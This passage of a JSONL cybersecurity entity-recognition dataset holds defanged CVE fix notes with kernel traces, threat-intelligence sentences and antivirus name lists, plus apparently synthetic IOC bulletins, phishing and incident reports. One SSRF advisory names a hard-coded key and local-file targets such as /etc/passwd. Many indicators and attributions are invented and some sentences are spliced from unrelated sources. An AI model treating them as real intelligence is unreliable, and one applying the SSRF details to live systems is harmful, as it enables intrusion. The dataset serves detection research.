"Indicator: 84.155.61.201": [[626, 657]], "Indicator: 741e805361b89941c2bf2026ec7852c2": [[689, 721]]}, "info": {"id": "synth_v2_01158", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm: Fix GEM free for imported dma-bufs\n\nImported dma-bufs also have obj->resv != &obj->_resv.  So we should\ncheck both this condition in addition to flags for handling the\n_NO_SHARE case.\n\nFixes this splat that was reported with IRIS video playback:\n\n    ------------[ cut here ]------------\n    WARNING: CPU: 3 PID: 2040 at drivers/gpu/drm/msm/msm_gem.c:1127 msm_gem_free_object+0x1f8/0x264 [msm]\n    CPU: 3 UID: 1000 PID: 2040 Comm: .gnome-shell-wr Not tainted 6.17.0-rc7 #1 PREEMPT\n    pstate: 81400005 (Nzcv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n    pc : msm_gem_free_object+0x1f8/0x264 [msm]\n    lr : msm_gem_free_object+0x138/0x264 [msm]\n    sp : ffff800092a1bb30\n    x29: ffff800092a1bb80 x28: ffff800092a1bce8 x27: ffffbc702dbdbe08\n    x26: 0000000000000008 x25: 0000000000000009 x24: 00000000000000a6\n    x23: ffff00083c72f850 x22: ffff00083c72f868 x21: ffff00087e69f200\n    x20: ffff00087e69f330 x19: ffff00084d157ae0 x18: 0000000000000000\n    x17: 0000000000000000 x16: ffffbc704bd46b80 x15: 0000ffffd0959540\n    x14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000\n    x11: ffffbc702e6cdb48 x10: 0000000000000000 x9 : 000000000000003f\n    x8 : ffff800092a1ba90 x7 : 0000000000000000 x6 : 0000000000000020\n    x5 : ffffbc704bd46c40 x4 : fffffdffe102cf60 x3 : 0000000000400032\n    x2 : 0000000000020000 x1 : ffff00087e6978e8 x0 : ffff00087e6977e8\n    Call trace:\n     msm_gem_free_object+0x1f8/0x264 [msm] (P)\n     drm_gem_object_free+0x1c/0x30 [drm]\n     drm_gem_object_handle_put_unlocked+0x138/0x150 [drm]\n     drm_gem_object_release_handle+0x5c/0xcc [drm]\n     drm_gem_handle_delete+0x68/0xbc [drm]\n     drm_gem_close_ioctl+0x34/0x40 [drm]\n     drm_ioctl_kernel+0xc0/0x130 [drm]\n     drm_ioctl+0x360/0x4e0 [drm]\n     __arm64_sys_ioctl+0xac/0x104\n     invoke_syscall+0x48/0x104\n     el0_svc_common.constprop.0+0x40/0xe0\n     do_el0_svc+0x1c/0x28\n     el0_svc+0x34/0xec\n     el0t_64_sync_handler+0xa0/0xe4\n     el0t_64_sync+0x198/0x19c\n    ---[ end trace 0000000000000000 ]---\n    ------------[ cut here ]------------\n\nPatchwork: hxxps://patchwork[ . ]freedesktop[ . ]org/patch/676273/", "spans": {"Indicator: https://patchwork.freedesktop.org/patch/676273/": [[2132, 2187]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-68189"}}
{"text": "Lookout researchers have identified a new , highly targeted surveillanceware family known as Desert Scorpion in the Google Play Store . Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets , keyloggers , remote access tools ( RATs ) , and wiper malware . The latest versions of PowerArchiver 2019 and WinRar displayed in their respective UI the executable SHIPPING_MX00034900_PL_INV_pdf[ . ]exe as the only content of the ZIP . However , lessons learned this year can help organizations take proactive steps to protect themselves from ransomware in 2023 .", "spans": {"Organization: Lookout": [[0, 7]], "Malware: Desert Scorpion": [[93, 108]], "System: Google Play Store": [[116, 133]], "Indicator: SHIPPING_MX00034900_PL_INV_pdf.exe": [[375, 413]]}, "info": {"id": "cyberner_stix_train_004568", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nax25: fix incorrect dev_tracker usage\n\nWhile investigating a separate rose issue [1], and enabling\nCONFIG_NET_DEV_REFCNT_TRACKER=y, Bernard reported an orthogonal ax25 issue [2]\n\nAn ax25_dev can be used by one (or many) struct ax25_cb.\nWe thus need different dev_tracker, one per struct ax25_cb.\n\nAfter this patch is applied, we are able to focus on rose.\n\n[1] hxxps://lore[ . ]kernel[ . ]org/netdev/fb7544a1-f42e-9254-18cc-c9b071f4ca70@free.fr/\n\n[2]\n[  205.798723] reference already released.\n[  205.798732] allocated in:\n[  205.798734]  ax25_bind+0x1a2/0x230 [ax25]\n[  205.798747]  __sys_bind+0xea/0x110\n[  205.798753]  __x64_sys_bind+0x18/0x20\n[  205.798758]  do_syscall_64+0x5c/0x80\n[  205.798763]  entry_SYSCALL_64_after_hwframe+0x44/0xae\n[  205.798768] freed in:\n[  205.798770]  ax25_release+0x115/0x370 [ax25]\n[  205.798778]  __sock_release+0x42/0xb0\n[  205.798782]  sock_close+0x15/0x20\n[  205.798785]  __fput+0x9f/0x260\n[  205.798789]  ____fput+0xe/0x10\n[  205.798792]  task_work_run+0x64/0xa0\n[  205.798798]  exit_to_user_mode_prepare+0x18b/0x190\n[  205.798804]  syscall_exit_to_user_mode+0x26/0x40\n[  205.798808]  do_syscall_64+0x69/0x80\n[  205.798812]  entry_SYSCALL_64_after_hwframe+0x44/0xae\n[  205.798827] ------------[ cut here ]------------\n[  205.798829] WARNING: CPU: 2 PID: 2605 at lib/ref_tracker.c:136 ref_tracker_free.cold+0x60/0x81\n[  205.798837] Modules linked in: rose netrom mkiss ax25 rfcomm cmac algif_hash algif_skcipher af_alg bnep snd_hda_codec_hdmi nls_iso8859_1 i915 rtw88_8821ce rtw88_8821c x86_pkg_temp_thermal rtw88_pci intel_powerclamp rtw88_core snd_hda_codec_realtek snd_hda_codec_generic ledtrig_audio coretemp snd_hda_intel kvm_intel snd_intel_dspcfg mac80211 snd_hda_codec kvm i2c_algo_bit drm_buddy drm_dp_helper btusb drm_kms_helper snd_hwdep btrtl snd_hda_core btbcm joydev crct10dif_pclmul btintel crc32_pclmul ghash_clmulni_intel mei_hdcp btmtk intel_rapl_msr aesni_intel bluetooth input_leds snd_pcm crypto_simd syscopyarea processor_thermal_device_pci_legacy sysfillrect cryptd intel_soc_dts_iosf snd_seq sysimgblt ecdh_generic fb_sys_fops rapl libarc4 processor_thermal_device intel_cstate processor_thermal_rfim cec snd_timer ecc snd_seq_device cfg80211 processor_thermal_mbox mei_me processor_thermal_rapl mei rc_core at24 snd intel_pch_thermal intel_rapl_common ttm soundcore int340x_thermal_zone video\n[  205.798948]  mac_hid acpi_pad sch_fq_codel ipmi_devintf ipmi_msghandler drm msr parport_pc ppdev lp parport ramoops pstore_blk reed_solomon pstore_zone efi_pstore ip_tables x_tables autofs4 hid_generic usbhid hid i2c_i801 i2c_smbus r8169 xhci_pci ahci libahci realtek lpc_ich xhci_pci_renesas [last unloaded: ax25]\n[  205.798992] CPU: 2 PID: 2605 Comm: ax25ipd Not tainted 5.18.11-F6BVP #3\n[  205.798996] Hardware name: To be filled by O.E.M. To be filled by O.E.M./CK3, BIOS 5.011 09/16/2020\n[  205.798999] RIP: 0010:ref_tracker_free.cold+0x60/0x81\n[  205.799005] Code: e8 d2 01 9b ff 83 7b 18 00 74 14 48 c7 c7 2f d7 ff 98 e8 10 6e fc ff 8b 7b 18 e8 b8 01 9b ff 4c 89 ee 4c 89 e7 e8 5d fd 07 00 <0f> 0b b8 ea ff ff ff e9 30 05 9b ff 41 0f b6 f7 48 c7 c7 a0 fa 4e\n[  205.799008] RSP: 0018:ffffaf5281073958 EFLAGS: 00010286\n[  205.799011] RAX: 0000000080000000 RBX: ffff9a0bd687ebe0 RCX: 0000000000000000\n[  205.799014] RDX: 0000000000000001 RSI: 0000000000000282 RDI: 00000000ffffffff\n[  205.799016] RBP: ffffaf5281073a10 R08: 0000000000000003 R09: fffffffffffd5618\n[  205.799019] R10: 0000000000ffff10 R11: 000000000000000f R12: ffff9a0bc53384d0\n[  205.799022] R13: 0000000000000282 R14: 00000000ae000001 R15: 0000000000000001\n[  205.799024] FS:  0000000000000000(0000) GS:ffff9a0d0f300000(0000) knlGS:0000000000000000\n[  205.799028] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[  205.799031] CR2: 00007ff6b8311554 CR3: 000000001ac10004 CR4: 00000000001706e0\n[  205.799033] Call Trace:\n[  205.799035]  <TASK>\n[  205.799038]  ? ax25_dev_device_down+0xd9/\n---truncated---", "spans": {"Indicator: https://lore.kernel.org/netdev/fb7544a1-f42e-9254-18cc-c9b071f4ca70@free.fr/": [[430, 514]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-50163"}}
{"text": "PlugX C2 server : ipsoftwarelabs[ . ]com .", "spans": {"Malware: PlugX": [[0, 5]], "Indicator: ipsoftwarelabs.com": [[18, 40]]}, "info": {"id": "cyberner_stix_train_002179", "source": "defanged_augment"}}
{"text": "MCCMS v2.7.0 has an SSRF vulnerability located in the index() method of the sys\\apps\\controllers\\api\\Gf.php file, where the pic parameter is processed. The pic parameter is decrypted using the sys_auth($pic, 1) function, which utilizes a hard-coded key Mc_Encryption_Key (bD2voYwPpNuJ7B8), defined in the db.php file. The decrypted URL is passed to the geturl() method, which uses cURL to make a request to the URL without proper security checks. An attacker can craft a malicious encrypted pic parameter, which, when decrypted, points to internal addresses or local file paths (such as http://127 [ . ] 0 [ . ] 0 [ . ] 1 or file://). By using the file:// protocol, the attacker can access arbitrary files on the local file system (e.g., file:///etc/passwd, file:///C:/Windows/System32/drivers/etc/hosts), allowing them to read sensitive configuration files, log files, and more, leading to information leakage or system exposure. The danger of this SSRF vulnerability includes accessing internal services and local file systems through protocols like hxxp://, ftp://, and file://, which can result in sensitive data leakage, remote code execution, privilege escalation, or full system compromise, severely affecting the system's security and stability.", "spans": {"Indicator: 127.0.0.1": [[594, 621]], "Indicator: http://,": [[1052, 1060]], "System: cURL": [[381, 385]], "Vulnerability: remote code execution": [[1126, 1147]], "Vulnerability: privilege escalation": [[1149, 1169]], "Vulnerability: SSRF": [[20, 24], [950, 954]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-50234"}}
{"text": "A backdoor also known as: Trojan.Strictor.D1B6BC BKDR_HPKELIHOS.SM4 Win32.Trojan.WisdomEyes.16070401.9500.9990 BKDR_HPKELIHOS.SM4 BehavesLike[.]Win32[.]Expiro[.]ch Trojan.WPCracker.u Trojan.Win32.Boaxxe W32/Injector.DDXZ!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Expiro.ch": [[130, 163]]}, "info": {"id": "cyner2_train_003033", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 179[.]64[.]220[.]180, the CrowdStrike IR team identified Latrodectus running as C:\\Users\\admin\\AppData\\Local\\Temp\\helper.sh. The threat actor, believed to be Ember Bear, used BloodHound for credential harvesting and Ligolo for lateral movement. Exfiltrated data was sent to static-mail[.]tech and storage-gateway[.]dev. The initial dropper (SHA1: 292b2a2795416121d57cc5a9d9a5d83cdd84821d) was delivered via a phishing email from helpdesk@identity-verify[.]cc. A second C2 node was observed at 141 [ . ] 70 [ . ] 59 [ . ] 113, with a persistence mechanism writing to /var/tmp/chrome_helper.exe.", "spans": {"Indicator: 179.64.220.180": [[64, 84]], "Organization: CrowdStrike": [[90, 101]], "Malware: Latrodectus": [[121, 132]], "Indicator: static-mail.tech": [[338, 356]], "Indicator: storage-gateway.dev": [[361, 382]], "Indicator: 292b2a2795416121d57cc5a9d9a5d83cdd84821d": [[411, 451]], "Indicator: helpdesk@identity-verify.cc": [[493, 522]], "Indicator: 141.70.59.113": [[557, 588]]}, "info": {"id": "synth_v2_00414", "source": "defanged_augment"}}
{"text": "IOC Bulletin - BumbleBee Campaign:\nNetwork Indicators:\n- 10[.]45[.]97[.]146\n- 10[.]10[.]40[.]28\n- 192[.]134[.]10[.]103\n- syncnode[.]io\n- storagenode[ . ]online\nURLs:\n- hxxp://backup-mail[.]org/api/v2/auth\n- hxxp://apisync[ . ]xyz/collect\nEmail Senders:\n- updates@mail-service[.]info\n- it@credential-check[ . ]site\nFile Indicators:\n- MD5: fff247031ec7bd8e09b2bdfeed816ee2\n- MD5: 58fffedd9d9f1a954694d4d13470f228\n- Drop path: /tmp/winlogon.exe", "spans": {"Malware: BumbleBee": [[15, 24]], "Indicator: 10.45.97.146": [[57, 75]], "Indicator: 10.10.40.28": [[78, 95]], "Indicator: 192.134.10.103": [[98, 118]], "Indicator: syncnode.io": [[121, 134]], "Indicator: storagenode.online": [[137, 159]], "Indicator: http://backup-mail.org/api/v2/auth": [[168, 204]], "Indicator: http://apisync.xyz/collect": [[207, 237]], "Indicator: updates@mail-service.info": [[255, 282]], "Indicator: it@credential-check.site": [[285, 313]], "Indicator: fff247031ec7bd8e09b2bdfeed816ee2": [[338, 370]], "Indicator: 58fffedd9d9f1a954694d4d13470f228": [[378, 410]]}, "info": {"id": "synth_v2_01420", "source": "defanged_augment"}}
{"text": "Multiple AsyncRAT samples identified:\n- SHA256: 20d4346443b1e9cf1ae0a388f969997489c5defccbc9c2c40ea2a98c382ac697\n- SHA256: b77958e427f54145fc2b6d719ba846367b5b496ca30879504b0b5331899ed4d8\n- MD5: 8f277b34e7ed296d4d1f69048f0ab2da\n- MD5: 2caa8607b73a1e1f0b406621489d1f5b\nAll samples beacon to 176 [ . ] 70 [ . ] 254 [ . ] 237 and malware-drop[[.]]net.", "spans": {"Malware: AsyncRAT": [[9, 17]], "Indicator: 20d4346443b1e9cf1ae0a388f969997489c5defccbc9c2c40ea2a98c382ac697": [[48, 112]], "Indicator: b77958e427f54145fc2b6d719ba846367b5b496ca30879504b0b5331899ed4d8": [[123, 187]], "Indicator: 8f277b34e7ed296d4d1f69048f0ab2da": [[195, 227]], "Indicator: 2caa8607b73a1e1f0b406621489d1f5b": [[235, 267]], "Indicator: 176.70.254.237": [[290, 322]], "Indicator: malware-drop[.]net": [[327, 347]]}, "info": {"id": "synth_00011", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Rapid7 identified a large-scale phishing operation. Emails originated from updates@secure-verify[ . ]net and security@document-share[ . ]link, spoofing legitimate services. Victims were directed to hxxps://cloud-mail[ . ]com/callback which hosted a credential harvesting page on login-data[.]tech. A secondary link hxxp://node-backup[.]io/portal/verify delivered SystemBC (SHA256: 4f37ce1a20322a17f0fa7cb7787a9e35b63b63eaab1641d071b3664b9a81fb1c). The malware was saved to /home/user/.config/update.dll and established C2 with 186[.]214[.]193[.]141.", "spans": {"Organization: Rapid7": [[26, 32]], "Indicator: updates@secure-verify.net": [[101, 130]], "Indicator: security@document-share.link": [[135, 167]], "Indicator: hxxps://cloud-mail.com/callback": [[224, 259]], "Indicator: login-data.tech": [[305, 322]], "Indicator: http://node-backup.io/portal/verify": [[341, 378]], "Malware: SystemBC": [[389, 397]], "Indicator: 4f37ce1a20322a17f0fa7cb7787a9e35b63b63eaab1641d071b3664b9a81fb1c": [[407, 471]], "Indicator: 186.214.193.141": [[553, 574]]}, "info": {"id": "synth_v2_00922", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: send: fix buffer overflow detection when copying path to cache entry\n\nStarting with commit c0247d289e73 (\"btrfs: send: annotate struct\nname_cache_entry with __counted_by()\") we annotated the variable length\narray \"name\" from the name_cache_entry structure with __counted_by() to\nimprove overflow detection. However that alone was not correct, because\nthe length of that array does not match the \"name_len\" field - it matches\nthat plus 1 to include the NUL string terminator, so that makes a\nfortified kernel think there's an overflow and report a splat like this:\n\n  strcpy: detected buffer overflow: 20 byte write of buffer size 19\n  WARNING: CPU: 3 PID: 3310 at __fortify_report+0x45/0x50\n  CPU: 3 UID: 0 PID: 3310 Comm: btrfs Not tainted 6.11.0-prnet #1\n  Hardware name: CompuLab Ltd.  sbc-ihsw/Intense-PC2 (IPC2), BIOS IPC2_3.330.7 X64 03/15/2018\n  RIP: 0010:__fortify_report+0x45/0x50\n  Code: 48 8b 34 (...)\n  RSP: 0018:ffff97ebc0d6f650 EFLAGS: 00010246\n  RAX: 7749924ef60fa600 RBX: ffff8bf5446a521a RCX: 0000000000000027\n  RDX: 00000000ffffdfff RSI: ffff97ebc0d6f548 RDI: ffff8bf84e7a1cc8\n  RBP: ffff8bf548574080 R08: ffffffffa8c40e10 R09: 0000000000005ffd\n  R10: 0000000000000004 R11: ffffffffa8c70e10 R12: ffff8bf551eef400\n  R13: 0000000000000000 R14: 0000000000000013 R15: 00000000000003a8\n  FS:  00007fae144de8c0(0000) GS:ffff8bf84e780000(0000) knlGS:0000000000000000\n  CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n  CR2: 00007fae14691690 CR3: 00000001027a2003 CR4: 00000000001706f0\n  Call Trace:\n   <TASK>\n   ? __warn+0x12a/0x1d0\n   ? __fortify_report+0x45/0x50\n   ? report_bug+0x154/0x1c0\n   ? handle_bug+0x42/0x70\n   ? exc_invalid_op+0x1a/0x50\n   ? asm_exc_invalid_op+0x1a/0x20\n   ? __fortify_report+0x45/0x50\n   __fortify_panic+0x9/0x10\n  __get_cur_name_and_parent+0x3bc/0x3c0\n   get_cur_path+0x207/0x3b0\n   send_extent_data+0x709/0x10d0\n   ? find_parent_nodes+0x22df/0x25d0\n   ? mas_nomem+0x13/0x90\n   ? mtree_insert_range+0xa5/0x110\n   ? btrfs_lru_cache_store+0x5f/0x1e0\n   ? iterate_extent_inodes+0x52d/0x5a0\n   process_extent+0xa96/0x11a0\n   ? __pfx_lookup_backref_cache+0x10/0x10\n   ? __pfx_store_backref_cache+0x10/0x10\n   ? __pfx_iterate_backrefs+0x10/0x10\n   ? __pfx_check_extent_item+0x10/0x10\n   changed_cb+0x6fa/0x930\n   ? tree_advance+0x362/0x390\n   ? memcmp_extent_buffer+0xd7/0x160\n   send_subvol+0xf0a/0x1520\n   btrfs_ioctl_send+0x106b/0x11d0\n   ? __pfx___clone_root_cmp_sort+0x10/0x10\n   _btrfs_ioctl_send+0x1ac/0x240\n   btrfs_ioctl+0x75b/0x850\n   __se_sys_ioctl+0xca/0x150\n   do_syscall_64+0x85/0x160\n   ? __count_memcg_events+0x69/0x100\n   ? handle_mm_fault+0x1327/0x15c0\n   ? __se_sys_rt_sigprocmask+0xf1/0x180\n   ? syscall_exit_to_user_mode+0x75/0xa0\n   ? do_syscall_64+0x91/0x160\n   ? do_user_addr_fault+0x21d/0x630\n  entry_SYSCALL_64_after_hwframe+0x76/0x7e\n  RIP: 0033:0x7fae145eeb4f\n  Code: 00 48 89 (...)\n  RSP: 002b:00007ffdf1cb09b0 EFLAGS: 00000246 ORIG_RAX: 0000000000000010\n  RAX: ffffffffffffffda RBX: 0000000000000004 RCX: 00007fae145eeb4f\n  RDX: 00007ffdf1cb0ad0 RSI: 0000000040489426 RDI: 0000000000000004\n  RBP: 00000000000078fe R08: 00007fae144006c0 R09: 00007ffdf1cb0927\n  R10: 0000000000000008 R11: 0000000000000246 R12: 00007ffdf1cb1ce8\n  R13: 0000000000000003 R14: 000055c499fab2e0 R15: 0000000000000004\n   </TASK>\n\nFix this by not storing the NUL string terminator since we don't actually\nneed it for name cache entries, this way \"name_len\" corresponds to the\nactual size of the \"name\" array. This requires marking the \"name\" array\nfield with __nonstring and using memcpy() instead of strcpy() as\nrecommended by the guidelines at:\n\n   hxxps://github[.]com/KSPP/linux/issues/90", "spans": {"Indicator: https://github.com/KSPP/linux/issues/90": [[3670, 3711]], "System: Linux kernel": [[7, 19]], "Vulnerability: buffer overflow": [[86, 101], [660, 675]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-49869"}}
{"text": "From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space . By looking at our telemetry , we found evidence that Turla installers were exfiltrating information to get[.]adobe[.]com URLs since at least July 2016 .", "spans": {"Malware: Carbanak": [[10, 18]], "Organization: banks": [[55, 60]], "Organization: electronic payment": [[65, 83]], "Organization: space": [[125, 130]], "Indicator: get.adobe.com": [[236, 253]]}, "info": {"id": "cyberner_stix_train_006279", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan.Qhost Trojan/KillProc.b Win.Trojan.4904185-1 Trojan.Inject.10975 Trojan.Win32.FakeAV TR/Qhost[ . ]DK.1 W32/Qhost[.]BE!tr Trojan:Win64/Qhost[ . ]DK Trj/CI.A Win32/Trojan.1ea", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Qhost.DK": [[121, 133], [167, 179]], "Indicator: Qhost.BE": [[140, 150]]}, "info": {"id": "cyner2_train_007092", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9951 Worm.BAT.Autorun.ex TrojWare.Win32.StartPage.~AO Win32.HLLW.Autoruner2.11336 Worm.AutoRun.Win32.42154 BehavesLike[ . ]Win32[ . ]Virus[ . ]cz Trojan-Dropper.Win32.Autorun Worm.BAT.al Win32.HeurC.KVM007.a.kcloud Worm.BAT.Autorun.ex TrojanDropper:Win32/Autorun.AC Worm/Win32.AutoRun.R74164 TScope.Trojan.Delf Trj/CI.A BAT/Autorun.BK Bat.Worm.Autorun.Aihw BAT/Autorun.EX!worm", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Virus.cz": [[171, 209]]}, "info": {"id": "cyner2_train_001537", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan.Tinba.WR4 Trojan/Tinba[.]be Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Backdoor2.HYQY Trojan.Win32.Inject.dqhpeo TrojWare.Win32.Tinba.BD Trojan.PWS.Tinba.153 Dropper.Injector.Win32.66634 Trojan.Win32.Exploit W32/Backdoor.DVHN-3684 TrojanDropper.Injector.avtd TR/Crypt.Xpack.182297 Trojan[Dropper]/Win32.Injector Trojan/Win32.Small.R145411 TrojanDropper.Injector Trojan.Symmi.DD5E0 Win32/Tinba[.]BE Trojan.DR.Injector!OJez9sRxlMc W32/Deshacop.XO!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Tinba.be": [[50, 60]], "Indicator: Tinba.BE": [[424, 434]]}, "info": {"id": "cyner2_train_000803", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G Virus.Virut.Win32.1939 W32[.]Virut[.]CF Win32/Virut.17408 PE_VIRUX.S-3 Win.Worm.Taz-1 Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg PE_VIRUX.S-3 Win32/Virut.bt Virus/Win32.Virut.ce Trojan:Win32/VBloader.B Virus.Win32.Virut.ce Win32/Virut.F Virus.Virut.14 Win32/Virut.NBP Trojan-Banker.Win32.Bancos W32/Sality.AO Virus.Win32.VirutChangeEntry.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: W32.Virut.CF": [[96, 112]]}, "info": {"id": "cyner2_train_007002", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan-Proxy/W32.Mitglieder.8304 Trojan/Proxy.Mitglieder.af TrojanProxy.Mitglied!TVlYB86T2l0 Trojan.Mitglieder.G Win32/Mitglieder.Z TSPY_TARNO.D Trojan.Win32.Mitglieder.dkdz TrojWare.Win32.TrojanProxy.Mitglieder.AF Trojan.Mitglieder.Win32.173 TSPY_TARNO.D BehavesLike.Win32.Downloader.xc W32/Mitglieder.M TrojanProxy.Mitglieder.h Win32.Troj.Mitglieder.af.kcloud TrojanProxy:Win32/Mitglieder[.]DK Win-Trojan/Mitglieder.8304 Trojan-Proxy.Win32.Mitglieder.e Trojan.Win32.Mitglieder.aTNT Win32/TrojanProxy.Mitglieder.AF Win32.Trojan-proxy.Mitglieder.Ectn Trojan-Proxy.Win32.Mitglieder.CL W32/Tarno.D!tr Proxy.4.AZ Win32/Trojan.63b", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Mitglieder.DK": [[406, 421]]}, "info": {"id": "cyner2_train_005579", "source": "defanged_augment"}}
{"text": "IOC Bulletin - AsyncRAT Campaign:\nNetwork Indicators:\n- 10[.]78[.]251[.]38\n- 102 [ . ] 184 [ . ] 101 [ . ] 207\n- 172 [ . ] 188 [ . ] 57 [ . ] 178\n- sync-auth[ . ]online\n- cdn-storage[ . ]info\nURLs:\n- hxxps://backup-mail[.]tech/secure/token\n- hxxp://secureauth[ . ]site/wp-content/uploads/doc.php\nEmail Senders:\n- it@credential-check[ . ]site\n- contact@identity-verify[.]cc\nFile Indicators:\n- MD5: 5a379577ed538e85d6937eaf93624e64\n- MD5: 65a7513e39ca007ffe47222540750fb5\n- Drop path: C:\\Users\\admin\\AppData\\Local\\Temp\\dropper.ps1", "spans": {"Malware: AsyncRAT": [[15, 23]], "Indicator: 10.78.251.38": [[56, 74]], "Indicator: 102.184.101.207": [[77, 110]], "Indicator: 172.188.57.178": [[113, 145]], "Indicator: sync-auth.online": [[148, 168]], "Indicator: cdn-storage.info": [[171, 191]], "Indicator: https://backup-mail.tech/secure/token": [[200, 239]], "Indicator: hxxp://secureauth.site/wp-content/uploads/doc.php": [[242, 295]], "Indicator: it@credential-check.site": [[313, 341]], "Indicator: contact@identity-verify.cc": [[344, 372]], "Indicator: 5a379577ed538e85d6937eaf93624e64": [[397, 429]], "Indicator: 65a7513e39ca007ffe47222540750fb5": [[437, 469]]}, "info": {"id": "synth_v2_01358", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Secureworks identified a large-scale phishing operation. Emails originated from hr@phishing-domain[ . ]com and admin@secure-verify[ . ]net, spoofing legitimate services. Victims were directed to hxxp://relay-gateway[ . ]club/download/update.exe which hosted a credential harvesting page on securesecure[.]tech. A secondary link hxxps://cache-node[.]club/gate.php delivered Vidar (MD5: 2531025e366c96da685e058bf681502a). The malware was saved to /dev/shm/chrome_helper.exe and established C2 with 10 [ . ] 104 [ . ] 230 [ . ] 135.", "spans": {"Organization: Secureworks": [[26, 37]], "Indicator: hr@phishing-domain.com": [[106, 132]], "Indicator: admin@secure-verify.net": [[137, 164]], "Indicator: hxxp://relay-gateway.club/download/update.exe": [[221, 270]], "Indicator: securesecure.tech": [[316, 335]], "Indicator: https://cache-node.club/gate.php": [[354, 388]], "Malware: Vidar": [[399, 404]], "Indicator: 2531025e366c96da685e058bf681502a": [[411, 443]], "Indicator: 10.104.230.135": [[522, 554]]}, "info": {"id": "synth_v2_01008", "source": "defanged_augment"}}
{"text": "CVE-2026-6122: A vulnerability has been found in Tenda F451 1 [ . ] 0 [ . ] 0 [ . ] 7. Affected by this issue is the function frmL7ProtForm of the file /goform/L7Prot of the component httpd. Such manipulation of the argument page leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", "spans": {"Vulnerability: CVE-2026-6122": [[0, 13]], "Vulnerability: buffer overflow": [[251, 266]], "Indicator: 1.0.0.7": [[60, 85]]}, "info": {"id": "nvd_2026_6122", "source": "defanged_augment"}}
{"text": "Extract the contacts list from the Facebook app . The Remsec malware used by Strider has a modular design . This backdoor allows attackers to spy on targeted victims . This includes hosting C&C domains that were used by Winnti such as mtrue[.]com , shenqi[.]kr and zhu[.]kr .", "spans": {"System: Facebook app": [[35, 47]], "Malware: backdoor": [[113, 121]], "Indicator: mtrue.com": [[235, 246]]}, "info": {"id": "cyberner_stix_train_000247", "source": "defanged_augment"}}
{"text": "'' The report said HummingBad apps are developed by Yingmob , a Chinese mobile ad server company that other researchers claim is behind the Yinspector iOS malware . These and other tools used by the Lazarus group can be mitigated by routinely scanning the network for any malicious activity to help prevent the malware from entering and spreading through an organization . APT33 : 64[.]251[.]19[.]214 mynetwork[ . ]ddns[ . ]net . To perform analysis of NetScaler memory core dump files , they need to be collected .", "spans": {"Malware: HummingBad": [[19, 29]], "Organization: Yingmob": [[52, 59]], "Malware: Yinspector": [[140, 150]], "System: iOS": [[151, 154]], "Indicator: 64.251.19.214": [[381, 400]], "Indicator: mynetwork.ddns.net": [[401, 427]], "System: NetScaler memory core dump files": [[453, 485]]}, "info": {"id": "cyberner_stix_train_005783", "source": "defanged_augment"}}
{"text": "In the injected payload , the module implements the method ‘ callActivityOnCreate ’ . This week we are going to discuss Clever Kitten , whom , by virtue of several indicators , we have affiliated with the Islamic Republic of Iran . It removes setup[.]exe ’s contents and replaces them with the third decrypted executable , a cryptocurrency miner . Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected .", "spans": {"Indicator: setup.exe": [[243, 254]], "Organization: Malwarebytes EDR and MDR": [[348, 372]]}, "info": {"id": "cyberner_stix_train_007286", "source": "defanged_augment"}}
{"text": "TG-3390 : 66 [ . ] 63 [ . ] 178 [ . ] 142 .", "spans": {"Indicator: 66.63.178.142": [[10, 41]]}, "info": {"id": "cyberner_stix_train_005472", "source": "defanged_augment"}}
{"text": "Microsoft MSRC published a threat intelligence report linking Kimsuky to a new campaign exploiting CVE-2023-34911 in Palo Alto PAN-OS. The attackers deployed Ryuk via LaZagne, establishing C2 communication with 209[.]181[.]136[.]204 and data-backup[.]top. A secondary payload was downloaded from hxxp://cdn-api[ . ]site/callback. The malware binary (SHA1: 8247cd21680ad26bf8e89a426617762360a7c176) was dropped to /dev/shm/update.dll. Phishing emails were sent from admin@account-update[ . ]xyz targeting enterprise users. A backup C2 server was identified at 21 [ . ] 191 [ . ] 207 [ . ] 118.", "spans": {"Organization: Microsoft MSRC": [[0, 14]], "Vulnerability: CVE-2023-34911": [[99, 113]], "System: Palo Alto PAN-OS": [[117, 133]], "Malware: Ryuk": [[158, 162]], "Indicator: 209.181.136.204": [[211, 232]], "Indicator: data-backup.top": [[237, 254]], "Indicator: http://cdn-api.site/callback": [[296, 328]], "Indicator: 8247cd21680ad26bf8e89a426617762360a7c176": [[356, 396]], "Indicator: admin@account-update.xyz": [[465, 493]], "Indicator: 21.191.207.118": [[559, 591]]}, "info": {"id": "synth_v2_00083", "source": "defanged_augment"}}
